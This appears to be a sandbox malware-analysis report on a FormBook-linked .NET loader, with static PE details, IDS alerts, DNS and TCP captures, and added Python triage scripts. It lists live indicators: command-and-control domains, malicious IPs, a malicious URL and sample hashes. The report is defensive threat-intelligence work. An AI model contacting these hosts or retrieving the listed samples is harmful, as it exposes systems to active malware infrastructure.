SOA #093732.exe (malicious) • 172.120.222.45
Invoice.exe (malicious) • 107.165.45.157
CC for account.exe (malicious) • 107.165.149.13
SKMBT_C224307532DL23457845_Product Order doc.exe (malicious) • 104.253.112.105
HQvI0y1Wu4.exe (malicious) • 107.165.37.235
KAZOX MATERIALS SDN BHD Purchase Order.exe (malicious) • 172.120.222.52
CONTRACT 312000H123 SSR ADVICE 31-05-2021 (1).xlsx (malicious) • 104.252.121.237
003 SOA.exe (malicious) • 104.164.224.68
Items and Specification Needed for RFQ546092227865431209PDF.exe (malicious) • 45.38.86.100
SKMBT_C22421033008180 png.exe (malicious) • 104.252.192.27
Swift copy_9808.exe (malicious) • 107.164.104.228

BIT-ISLEEquinixJpapanEnterpriseKKJP
ye4nYRzxJa.exe (malicious) • 103.120.12.94
tgb4.exe (malicious) • 103.109.252.105
GoRnrfZlAG.exe (malicious) • 103.120.13.150
bin.exe (malicious) • 103.120.13.158
b02c0831_by_Libranalysis.exe (malicious) • 103.120.13.202
vZMIGFMR.exe (malicious) • 103.120.15.179
6d56768e_by_Libranalysis.exe (malicious) • 103.120.13.189
RDAx9iDSEL.exe (malicious) • 103.120.12.236
lFfDzzZYTl.exe (malicious) • 103.120.12.218
NMpDBwHJP8.exe (malicious) • 103.120.12.151
pumYguna1i.exe (malicious) • 103.120.12.151
DYANAMIC Inquiry.xlsx (malicious) • 103.120.12.153
Q1VDYnqeBX.exe (malicious) • 103.94.151.135
50729032021.xlsx (malicious) • 103.94.151.208
PROJ3144534685007.exe (malicious) • 103.192.160.224
orii11.exe (malicious) • 103.192.160.203
bnb.exe (malicious) • 103.192.160.244
SecuriteInfo.com.Trojan.Inject4.6572.18135.exe (malicious) • 103.109.255.90
RFQ SECO WARWICK Germany.doc (malicious) • 202.59.235.199
https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343 (malicious) • 202.131.200.84

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UOMp9cDcqZ.exe.log
                                                      Process:C:\Users\user\Desktop\UOMp9cDcqZ.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1314
                                                      Entropy (8bit):5.350128552078965
                                                      Encrypted:false
                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
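A note on this dropped file: a `CLR_v4.0_32\UsageLogs\<exe>.log` is written by the .NET runtime itself to record which assemblies a process loaded, which is why the sandbox marks it both "Malicious: true" (created by the malicious process) and "very likely benign" by reputation. Its content is still useful: it shows the loader pulled in Microsoft.VisualBasic, System.Windows.Forms and friends before handing off to the injected FormBook code. Below is an added example, not part of the report, of turning such a log into a list of loaded assemblies and flagging any that are not signed with a Microsoft framework key. `USAGE_LOG` is the readable part of the preview above with the `..` separators restored to line breaks and the truncated final record left out; the field meanings (record kind, display name, optional native-image path, flag) are inferred from that preview alone, and the record-kind handling is this example's assumption.

```python
"""Parse a CLR UsageLogs file into the assemblies it records.

Added example, not from the Joe Sandbox report. USAGE_LOG is transcribed from the
report's file preview (truncated last record dropped). Field meanings are inferred
from the preview: <kind>,"<display name>"[,"<native image path>"],<flag>.
"""
import csv

USAGE_LOG = (
    '1,"fusion","GAC",0\n'
    '1,"WinRT","NotApp",1\n'
    '2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\\System.ni.dll",0\n'
    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\f1d8480152e0da9a60ad49c6d16a3b6d\\System.Core.ni.dll",0\n'
    '3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\8d67d92724ba494b6c7fd089d6f25b48\\System.Configuration.ni.dll",0\n'
)

# Public key tokens used by the .NET Framework's own assemblies (ECMA key, Microsoft key, Microsoft shared key).
MICROSOFT_TOKENS = {"b77a5c561934e089", "b03f5f7f11d50a3a", "31bf3856ad364e35"}


def parse_display_name(display):
    """'Name, Version=.., Culture=.., PublicKeyToken=..' -> {'name': .., 'Version': .., ...}."""
    parts = [p.strip() for p in display.split(",")]
    info = {"name": parts[0]}
    for part in parts[1:]:
        if "=" in part:
            key, value = part.split("=", 1)
            info[key] = value
    return info


def parse_usage_log(text):
    """Return one record per assembly-load line; kind 1 rows (loader/config entries) are skipped.
    Assumption from the preview: kind 2 = assembly by display name, kind 3 = same plus NGen image path."""
    records = []
    for row in csv.reader(text.splitlines()):   # csv handles the quoted, comma-bearing display names
        if not row:
            continue
        kind = int(row[0])
        if kind not in (2, 3):
            continue
        rec = parse_display_name(row[1])
        rec["kind"] = kind
        rec["native_image"] = row[2] if kind == 3 and len(row) > 3 else None
        records.append(rec)
    return records


def loaded_assemblies(records):
    """Simple names in load order."""
    return [r["name"] for r in records]


def non_framework_assemblies(records):
    """Assemblies not signed with a Microsoft framework key. In a log written by a
    suspicious process these are the first candidates for a dropped or injected payload;
    an unsigned assembly shows up as PublicKeyToken=null."""
    return [r["name"] for r in records
            if r.get("PublicKeyToken", "null").lower() not in MICROSOFT_TOKENS]


if __name__ == "__main__":
    recs = parse_usage_log(USAGE_LOG)
    print("loaded:", loaded_assemblies(recs))
    print("with native image:", [r["name"] for r in recs if r["native_image"]])
    print("non-framework:", non_framework_assemblies(recs))
```

For this sample every recorded assembly is a framework one, so the log tells you what the loader needed (VisualBasic and WinForms runtime support) rather than naming a payload; the same parser run over every `UsageLogs\*.log` under a user's profile is a cheap way to spot processes that loaded an unsigned assembly.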

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.859694041798628
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:UOMp9cDcqZ.exe
                                                      File size:993792
                                                      MD5:15d907e7d9f8286e5053796c9d78fcec
                                                      SHA1:b7d7329e94e2292ed53e2778cebec533ac599030
                                                      SHA256:771e4f69520f71afe6a6e9a4eb4de7dcd8d7521d90db290ca6c27b1a95c532af
                                                      SHA512:c11d01a61f3dab5923cc7c2a64eae2732b5633376d3ef3f9fdf6a0e59567226eca74b84e4cad49da87f6538b6c42c7f7a98a552c12e7b0917e6ff5f81d09f02e
                                                      SSDEEP:24576:vo2y0RBSy/DrDoqbg1L+8XAaIXqziNeBUdt:vXNzrrDoeg1qYBIOiwBU
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..`..............P..............=... ...@....@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:00828e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4f3d1a
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x60C1DD5B [Thu Jun 10 09:37:31 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al (this line is repeated 97 times in the report: the bytes after the 6-byte jmp are zero padding, and 00 00 disassembles as add byte ptr [eax], al)

                                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf3cc8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x680 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf3b90 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xf1d20 | 0xf1e00 | False | 0.883397932817 | data | 7.86649805273 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xf4000 | 0x680 | 0x800 | False | 0.34375 | data | 3.58059982943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xf4090 | 0x3f0 | SysEx File - OctavePlateau | |
RT_MANIFEST | 0xf4490 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                      Imports

DLL | Import
mscoree.dll | _CorExeMain
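The static facts above fit together: the only import is mscoree.dll!_CorExeMain through an 8-byte IAT at RVA 0x2000, the entrypoint is the standard 32-bit .NET stub `jmp dword ptr [00402000h]` (so the native entrypoint says nothing about what the program does; the CLR runs the managed code), the whole program is one executable section of 0xf1e00 bytes at 7.87 bits per byte of entropy, the timestamp is the day before the analysis run, and the file is unsigned. That combination is what an encrypted payload inside a thin .NET loader looks like. As an added example, not the report's or Joe Sandbox's own tooling, here are those checks scripted: the section records, image base, IAT RVA and timestamp are transcribed from the report; the 7.0 entropy threshold, the 90% single-section rule and the byte encoding assumed for the entrypoint instruction are this example's own choices.

```python
"""Static-triage checks over the PE facts a sandbox report lists.

Added example, not part of the report. Section records, image base, IAT RVA and
TimeDateStamp are transcribed from the report; thresholds and the assumed encoding
of the entrypoint instruction (FF 25 <abs32>) are this example's assumptions.
"""
from collections import Counter
from datetime import datetime, timezone
from math import log2

# (name, virtual address, virtual size, raw size, entropy, characteristics), from the Sections table.
SECTIONS = [
    (".text", 0x2000, 0xF1D20, 0xF1E00, 7.86649805273,
     "IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ"),
    (".rsrc", 0xF4000, 0x680, 0x800, 3.58059982943,
     "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ"),
    (".reloc", 0xF6000, 0xC, 0x200, 0.101910425663,
     "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ"),
]
FILE_SIZE = 993792
IMAGE_BASE = 0x400000
IAT_RVA = 0x2000          # IMAGE_DIRECTORY_ENTRY_IAT, size 8: one slot, mscoree!_CorExeMain
TIME_DATE_STAMP = 0x60C1DD5B
# Assumed bytes behind "jmp dword ptr [00402000h]": FF 25 + absolute address, then zero padding.
ENTRY_BYTES = bytes.fromhex("ff2500204000") + b"\x00" * 10


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def pe_timestamp_utc(ts: int) -> str:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch (easily forged, but
    here it sits one day before the sandbox run, which is consistent with a fresh build)."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def is_managed_entry_stub(entry: bytes, image_base: int, iat_rva: int) -> bool:
    """True if the entrypoint is 'jmp dword ptr [image_base + iat_rva]', i.e. the stub every
    32-bit .NET assembly carries to bounce into mscoree!_CorExeMain."""
    if entry[:2] != b"\xff\x25":
        return False
    target = int.from_bytes(entry[2:6], "little")
    return target == image_base + iat_rva


def triage_sections(sections, file_size, entropy_threshold=7.0, bulk_ratio=0.9):
    """Flag executable sections whose bytes look encrypted or compressed, sections that
    hold almost the entire file, and sections that grow substantially when mapped."""
    findings = []
    for name, _va, vsize, rawsize, entropy, chars in sections:
        executable = "IMAGE_SCN_MEM_EXECUTE" in chars
        if executable and entropy > entropy_threshold:
            findings.append(f"{name}: executable section with entropy {entropy:.2f} (likely packed/encrypted)")
        if rawsize / file_size > bulk_ratio:
            findings.append(f"{name}: {rawsize / file_size:.1%} of the file lives in this one section")
        if vsize > rawsize + 0x1000:
            findings.append(f"{name}: virtual size exceeds raw size by {vsize - rawsize:#x} bytes (unpacks in memory)")
    return findings


if __name__ == "__main__":
    print("TimeDateStamp:", pe_timestamp_utc(TIME_DATE_STAMP), "UTC")
    print("managed entry stub:", is_managed_entry_stub(ENTRY_BYTES, IMAGE_BASE, IAT_RVA))
    for finding in triage_sections(SECTIONS, FILE_SIZE):
        print(finding)
```

`shannon_entropy` is included so the same rule can be run on raw section bytes of a file you have in hand; for a report you only get the number the sandbox computed, which is why `triage_sections` takes the entropy as input rather than recomputing it.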

                                                      Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright Sutton Grammar School 2015
Assembly Version | 1.0.0.0
InternalName | OrderablePartitioner.exe
FileVersion | 1.0.0.0
CompanyName | Sutton Grammar School
LegalTrademarks |
Comments |
ProductName | Aspiring Rookie - Basketball
ProductVersion | 1.0.0.0
FileDescription | Aspiring Rookie - Basketball
OriginalFilename | OrderablePartitioner.exe

                                                      Network Behavior

                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-16:57:51.970759 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49719 | 103.120.12.113 | 192.168.2.5
06/11/21-16:58:02.278377 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49727 | 34.102.136.180 | 192.168.2.5
06/11/21-16:58:07.403292 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49728 | 80 | 192.168.2.5 | 52.58.78.16
06/11/21-16:58:07.403292 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49728 | 80 | 192.168.2.5 | 52.58.78.16
06/11/21-16:58:07.403292 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49728 | 80 | 192.168.2.5 | 52.58.78.16

                                                      Network Port Distribution

                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 16:57:45.441020966 CEST | 49718 | 80 | 192.168.2.5 | 142.111.47.2
Jun 11, 2021 16:57:45.639610052 CEST | 80 | 49718 | 142.111.47.2 | 192.168.2.5
Jun 11, 2021 16:57:45.639869928 CEST | 49718 | 80 | 192.168.2.5 | 142.111.47.2
Jun 11, 2021 16:57:45.640141010 CEST | 49718 | 80 | 192.168.2.5 | 142.111.47.2
Jun 11, 2021 16:57:45.838773012 CEST | 80 | 49718 | 142.111.47.2 | 192.168.2.5
Jun 11, 2021 16:57:45.838835955 CEST | 80 | 49718 | 142.111.47.2 | 192.168.2.5
Jun 11, 2021 16:57:45.839091063 CEST | 49718 | 80 | 192.168.2.5 | 142.111.47.2
Jun 11, 2021 16:57:45.839256048 CEST | 49718 | 80 | 192.168.2.5 | 142.111.47.2
Jun 11, 2021 16:57:46.036894083 CEST | 80 | 49718 | 142.111.47.2 | 192.168.2.5
Jun 11, 2021 16:57:51.388333082 CEST | 49719 | 80 | 192.168.2.5 | 103.120.12.113
Jun 11, 2021 16:57:51.679419994 CEST | 80 | 49719 | 103.120.12.113 | 192.168.2.5
Jun 11, 2021 16:57:51.679626942 CEST | 49719 | 80 | 192.168.2.5 | 103.120.12.113
Jun 11, 2021 16:57:51.679858923 CEST | 49719 | 80 | 192.168.2.5 | 103.120.12.113
Jun 11, 2021 16:57:51.970685005 CEST | 80 | 49719 | 103.120.12.113 | 192.168.2.5
Jun 11, 2021 16:57:51.970758915 CEST | 80 | 49719 | 103.120.12.113 | 192.168.2.5
Jun 11, 2021 16:57:51.970772028 CEST | 80 | 49719 | 103.120.12.113 | 192.168.2.5
Jun 11, 2021 16:57:51.970964909 CEST | 49719 | 80 | 192.168.2.5 | 103.120.12.113
Jun 11, 2021 16:57:51.971105099 CEST | 49719 | 80 | 192.168.2.5 | 103.120.12.113
Jun 11, 2021 16:57:52.261929035 CEST | 80 | 49719 | 103.120.12.113 | 192.168.2.5
Jun 11, 2021 16:58:02.097131014 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 16:58:02.139584064 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 16:58:02.139719963 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 16:58:02.140011072 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 16:58:02.182245970 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 16:58:02.278377056 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 16:58:02.278445005 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 16:58:02.278543949 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 16:58:02.282665014 CEST | 49727 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 16:58:02.324836016 CEST | 80 | 49727 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 16:58:07.360459089 CEST | 49728 | 80 | 192.168.2.5 | 52.58.78.16
Jun 11, 2021 16:58:07.402939081 CEST | 80 | 49728 | 52.58.78.16 | 192.168.2.5
Jun 11, 2021 16:58:07.403177023 CEST | 49728 | 80 | 192.168.2.5 | 52.58.78.16
Jun 11, 2021 16:58:07.403291941 CEST | 49728 | 80 | 192.168.2.5 | 52.58.78.16
Jun 11, 2021 16:58:07.445632935 CEST | 80 | 49728 | 52.58.78.16 | 192.168.2.5
Jun 11, 2021 16:58:07.445677042 CEST | 80 | 49728 | 52.58.78.16 | 192.168.2.5
Jun 11, 2021 16:58:07.445689917 CEST | 80 | 49728 | 52.58.78.16 | 192.168.2.5
Jun 11, 2021 16:58:07.445919991 CEST | 49728 | 80 | 192.168.2.5 | 52.58.78.16
Jun 11, 2021 16:58:07.445959091 CEST | 49728 | 80 | 192.168.2.5 | 52.58.78.16
Jun 11, 2021 16:58:07.488323927 CEST | 80 | 49728 | 52.58.78.16 | 192.168.2.5
Jun 11, 2021 16:58:12.533590078 CEST | 49729 | 80 | 192.168.2.5 | 78.31.67.91
Jun 11, 2021 16:58:12.589776993 CEST | 80 | 49729 | 78.31.67.91 | 192.168.2.5
Jun 11, 2021 16:58:12.590086937 CEST | 49729 | 80 | 192.168.2.5 | 78.31.67.91
Jun 11, 2021 16:58:12.590209007 CEST | 49729 | 80 | 192.168.2.5 | 78.31.67.91
Jun 11, 2021 16:58:12.645725012 CEST | 80 | 49729 | 78.31.67.91 | 192.168.2.5
Jun 11, 2021 16:58:12.645829916 CEST | 80 | 49729 | 78.31.67.91 | 192.168.2.5
Jun 11, 2021 16:58:12.645905018 CEST | 49729 | 80 | 192.168.2.5 | 78.31.67.91
Jun 11, 2021 16:58:12.812756062 CEST | 80 | 49729 | 78.31.67.91 | 192.168.2.5
Jun 11, 2021 16:58:12.812885046 CEST | 49729 | 80 | 192.168.2.5 | 78.31.67.91
Jun 11, 2021 16:58:13.082334042 CEST | 49729 | 80 | 192.168.2.5 | 78.31.67.91
Jun 11, 2021 16:58:13.135490894 CEST | 80 | 49729 | 78.31.67.91 | 192.168.2.5
Jun 11, 2021 16:58:13.496877909 CEST | 80 | 49729 | 78.31.67.91 | 192.168.2.5
Jun 11, 2021 16:58:13.496973038 CEST | 49729 | 80 | 192.168.2.5 | 78.31.67.91
Jun 11, 2021 16:58:18.381213903 CEST | 49731 | 80 | 192.168.2.5 | 148.59.128.71
Jun 11, 2021 16:58:18.538333893 CEST | 80 | 49731 | 148.59.128.71 | 192.168.2.5
Jun 11, 2021 16:58:18.538448095 CEST | 49731 | 80 | 192.168.2.5 | 148.59.128.71
Jun 11, 2021 16:58:18.538600922 CEST | 49731 | 80 | 192.168.2.5 | 148.59.128.71
Jun 11, 2021 16:58:18.697585106 CEST | 80 | 49731 | 148.59.128.71 | 192.168.2.5
Jun 11, 2021 16:58:18.697621107 CEST | 80 | 49731 | 148.59.128.71 | 192.168.2.5
Jun 11, 2021 16:58:18.697837114 CEST | 49731 | 80 | 192.168.2.5 | 148.59.128.71
Jun 11, 2021 16:58:18.697937012 CEST | 49731 | 80 | 192.168.2.5 | 148.59.128.71
Jun 11, 2021 16:58:18.854981899 CEST | 80 | 49731 | 148.59.128.71 | 192.168.2.5

                                                      UDP Packets


                                                      DNS Queries

                                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                       Jun 11, 2021 16:56:13.834532022 CEST | 192.168.2.5 | 8.8.8.8 | 0x12a7 | Standard query (0) | clientconfig.passport.net | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:57:45.265314102 CEST | 192.168.2.5 | 8.8.8.8 | 0x24a3 | Standard query (0) | www.yunlimall.com | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:57:50.851202965 CEST | 192.168.2.5 | 8.8.8.8 | 0xbe39 | Standard query (0) | www.dmgt4m2g8y2uh.net | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:02.030219078 CEST | 192.168.2.5 | 8.8.8.8 | 0xe859 | Standard query (0) | www.thesoulrevitalist.com | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:07.289143085 CEST | 192.168.2.5 | 8.8.8.8 | 0xde2a | Standard query (0) | www.newmopeds.com | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:12.461456060 CEST | 192.168.2.5 | 8.8.8.8 | 0x4005 | Standard query (0) | www.cleanxcare.com | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:18.138658047 CEST | 192.168.2.5 | 8.8.8.8 | 0xc0b4 | Standard query (0) | www.hazard-protection.com | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:23.717089891 CEST | 192.168.2.5 | 8.8.8.8 | 0x21b6 | Standard query (0) | www.jonathan-mandt.com | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:28.787653923 CEST | 192.168.2.5 | 8.8.8.8 | 0xeecc | Standard query (0) | www.zgcbw.net | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:34.159264088 CEST | 192.168.2.5 | 8.8.8.8 | 0x668a | Standard query (0) | www.trendbold.com | A (IP address) | IN (0x0001)

                                                      DNS Answers

                                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                       Jun 11, 2021 16:56:13.894788027 CEST | 8.8.8.8 | 192.168.2.5 | 0x12a7 | No error (0) | clientconfig.passport.net | authgfx.msa.akadns6.net |  | CNAME (Canonical name) | IN (0x0001)
                                                       Jun 11, 2021 16:57:45.429331064 CEST | 8.8.8.8 | 192.168.2.5 | 0x24a3 | No error (0) | www.yunlimall.com |  | 142.111.47.2 | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:57:51.386482954 CEST | 8.8.8.8 | 192.168.2.5 | 0xbe39 | No error (0) | www.dmgt4m2g8y2uh.net |  | 103.120.12.113 | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:02.094945908 CEST | 8.8.8.8 | 192.168.2.5 | 0xe859 | No error (0) | www.thesoulrevitalist.com | thesoulrevitalist.com |  | CNAME (Canonical name) | IN (0x0001)
                                                       Jun 11, 2021 16:58:02.094945908 CEST | 8.8.8.8 | 192.168.2.5 | 0xe859 | No error (0) | thesoulrevitalist.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:07.359154940 CEST | 8.8.8.8 | 192.168.2.5 | 0xde2a | No error (0) | www.newmopeds.com |  | 52.58.78.16 | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:12.530822039 CEST | 8.8.8.8 | 192.168.2.5 | 0x4005 | No error (0) | www.cleanxcare.com | cleanxcare.com |  | CNAME (Canonical name) | IN (0x0001)
                                                       Jun 11, 2021 16:58:12.530822039 CEST | 8.8.8.8 | 192.168.2.5 | 0x4005 | No error (0) | cleanxcare.com |  | 78.31.67.91 | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:18.379194975 CEST | 8.8.8.8 | 192.168.2.5 | 0xc0b4 | No error (0) | www.hazard-protection.com |  | 148.59.128.71 | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:23.781076908 CEST | 8.8.8.8 | 192.168.2.5 | 0x21b6 | Name error (3) | www.jonathan-mandt.com | none | none | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:28.862853050 CEST | 8.8.8.8 | 192.168.2.5 | 0xeecc | Name error (3) | www.zgcbw.net | none | none | A (IP address) | IN (0x0001)
                                                       Jun 11, 2021 16:58:34.238081932 CEST | 8.8.8.8 | 192.168.2.5 | 0x668a | No error (0) | www.trendbold.com |  | 64.190.62.111 | A (IP address) | IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.yunlimall.com
                                                      • www.dmgt4m2g8y2uh.net
                                                      • www.thesoulrevitalist.com
                                                      • www.newmopeds.com
                                                      • www.cleanxcare.com
                                                      • www.hazard-protection.com

                                                      HTTP Packets

                                                       Session 0: 192.168.2.5:49718 -> 142.111.47.2:80, process C:\Windows\explorer.exe
                                                       Timestamp | kBytes transferred | Direction | Data
